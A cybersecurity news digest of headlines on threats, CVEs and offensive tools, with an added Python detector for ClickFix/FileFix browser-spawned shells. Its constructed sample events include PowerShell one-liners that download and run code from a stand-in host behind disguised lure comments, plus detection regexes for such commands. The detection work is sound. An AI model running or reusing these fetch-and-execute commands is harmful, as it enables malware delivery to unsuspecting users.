State Secrets for Sale: More Leaks from the Chinese Hack-for-Hire Industry
We focus on technical intelligence, research and engineering to help operational [blue|purple] teams defend their estates and have awareness of the world.
Phishing Attack: Deploying Malware on Indian Defense BOSS Linux
Statement Regarding Recent Misuse of Shellter Elite and Elastic Security Labs’ Handling
The Hard Truths of SOC Modernization
Workload identities: from Attack to Defense with Microsoft Security
NSB (國家安全局, Taiwan National Security Bureau): NSB Alerts the Significant Cybersecurity Risks in China-Made Mobile Applications
Clickfix / Filefix mitigation
CVE-2024-44258: a symlink vulnerability within the ManagedConfiguration framework and the profiled daemon in Apple devices. When restoring a crafted backup, the migration process fails to validate whether the destination folder is a symbolic link (symlink), leading to unauthorized file migration
MentalTi: ETW TI parser
Dream walkers: Reflective shellcode loader with advanced call stack spoofing and .NET support.
KQL for Suspicious Browser Child Process or the socially engineered Filefix technique
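The detection idea behind that post (a browser spawning a shell or script interpreter, with the command line carrying the usual lure and download markers) is shown here as an added example in Python rather than as the post's KQL, so it can be run over sample data offline. The field names mirror the Defender DeviceProcessEvents columns a KQL rule would query; the events, hosts, timestamps and command lines are constructed, and the scoring weights are this example's own choice.

```python
from dataclasses import dataclass
import re


@dataclass
class ProcessEvent:
    """One process-creation record (constructed; names follow DeviceProcessEvents)."""
    timestamp: str
    device_name: str
    initiating_process_file_name: str   # parent process
    file_name: str                      # child process
    process_command_line: str


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "opera.exe", "iexplore.exe"}

# Children a browser has no business launching directly.
SUSPICIOUS_CHILDREN = {
    "cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "wscript.exe", "cscript.exe",
    "rundll32.exe", "regsvr32.exe", "certutil.exe", "curl.exe", "bitsadmin.exe", "msiexec.exe",
}

# (regex, label, weight) applied to the child's command line.
CMDLINE_INDICATORS = [
    (r"(?i)(^|\s)-(e|ec|enc|encodedcommand)\s", "encoded command", 3),
    (r"(?i)\b(iex|invoke-expression)\b", "Invoke-Expression", 3),
    (r"(?i)\b(downloadstring|downloadfile|invoke-webrequest|iwr|curl|wget|start-bitstransfer)\b",
     "download primitive", 2),
    (r"(?i)https?://", "URL in command line", 2),
    (r"(?i)-w(indowstyle)?\s+hidden", "hidden window", 2),
    (r"(?i)-(ep|executionpolicy)\s+bypass", "ExecutionPolicy bypass", 2),
    # FileFix pastes a command into the file dialog's address bar, disguised with
    # a trailing '# <path>' comment that looks like the file the user expects.
    (r"#\s*[A-Za-z]:\\", "trailing # comment disguised as a file path (FileFix lure)", 3),
    # ClickFix lures commonly append a fake 'verification' comment instead.
    (r"(?i)#.*(robot|captcha|verif)", "trailing 'verification' comment (ClickFix lure)", 3),
]


def score_event(ev, browsers=BROWSERS):
    """Return (score, reasons). Zero unless a browser parent spawns a
    suspicious child; command-line indicators then add to a base score."""
    parent = ev.initiating_process_file_name.lower()
    child = ev.file_name.lower()
    if parent not in browsers or child not in SUSPICIOUS_CHILDREN:
        return 0, []
    score, reasons = 2, [f"{parent} spawned {child}"]
    for pattern, label, weight in CMDLINE_INDICATORS:
        if re.search(pattern, ev.process_command_line):
            score += weight
            reasons.append(label)
    return score, reasons


def detect(events, threshold=4):
    """Alert on every event whose score reaches the threshold."""
    alerts = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            alerts.append({
                "timestamp": ev.timestamp, "device_name": ev.device_name,
                "parent": ev.initiating_process_file_name, "child": ev.file_name,
                "score": score, "reasons": reasons,
            })
    return alerts


# Constructed sample telemetry: one benign renderer spawn, one FileFix-style
# browser->PowerShell launch, one Win+R ClickFix launch (parent explorer.exe,
# so outside this rule's scope), one low-signal installer launch.
SAMPLE_EVENTS = [
    ProcessEvent("2025-07-07T09:12:01Z", "WS-0142", "chrome.exe", "chrome.exe",
                 '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --type=renderer'),
    ProcessEvent("2025-07-07T09:14:33Z", "WS-0142", "msedge.exe", "powershell.exe",
                 'powershell -w hidden -ep bypass -c "iex (iwr https://example.invalid/u)"'
                 ' # C:\\Company\\Shared\\HR-Policy.pdf'),
    ProcessEvent("2025-07-07T09:15:10Z", "WS-0142", "explorer.exe", "powershell.exe",
                 'powershell -w hidden -c "iex (iwr https://example.invalid/c)"'
                 ' # I am not a robot - reCAPTCHA Verification ID: 7811'),
    ProcessEvent("2025-07-07T09:20:45Z", "WS-0198", "firefox.exe", "msiexec.exe",
                 'msiexec /i "C:\\Users\\alice\\Downloads\\Teams.msi"'),
]


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

Only the msedge.exe to powershell.exe event clears the threshold. The explorer.exe-parented ClickFix event in the sample is deliberately not matched: the Run dialog is hosted by explorer.exe, so a browser-parent rule covers FileFix but needs a companion rule with explorer.exe in the parent set to catch the Win+R variant, and that rule will need tighter command-line conditions because explorer.exe legitimately launches a great deal.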
Intune Security Baselines: The Truth Behind the Chaos - "if you created a baseline for 23H2 and deviated from the recommended settings, then the wheels would fall off when upgrading the baseline to 24H2"
‘It's Not Paranoia If They're Really After You’: When Announcing Deception Technology Can Change Attacker Decisions
PEVuln: a benchmark dataset for using machine learning to detect vulnerabilities in PE malware
XWorm's Shape-Shifting Arsenal: Loader and Stager Variants in the Wild
RECON-6: query the value of DPCertType (1 = self-signed, 2 = PKI); a distribution point with a value of 2 is vulnerable to ELEVATE-4
ELEVATE-4: Distribution Point Takeover via PXE Boot Spoofing - "An attacker who is able to successfully spoof PXE boot deployment and extract the PKI certificate from the PXE boot variables file contents may gain control of the certificate's AD identity."
Identifying and abusing Azure Arc for hybrid escalation and persistence
CTO at NCSC Summary: week ending July 6th
This subreddit is for technical professionals to discuss cybersecurity news, research, threats, etc.
[2506.19453] FuncVul: An Effective Function Level Vulnerability Detection Model using LLM and Code Chunk
[2506.20415] SV-LLM: An Agentic Approach for SoC Security Verification using Large Language Models - "The system aims to reduce manual intervention, improve accuracy, and accelerate security analysis, supporting proactive identification and mitigation of risks early in the design cycle."
Azure's Role Roulette: How Over-Privileged Roles and API Vulnerabilities Expose Enterprise Networks - "After reporting this issue to Microsoft, their response was that this is a ‘low severity’ security issue and they decided to not fix it. I later noticed some major documentation changes"
Applocker bypass on Lenovo machines – The curious case of MFGSTAT.zip
Threat Actors Exploit CVE-2025-3248 to Deliver Flodrix Botnet - CVE-2025-3248 (CVSS 9.8) in Langflow versions prior to 1.3.0 allows unauthenticated remote code execution. The Flodrix botnet is delivered via malicious Python payloads, enabling DDoS attacks and data theft.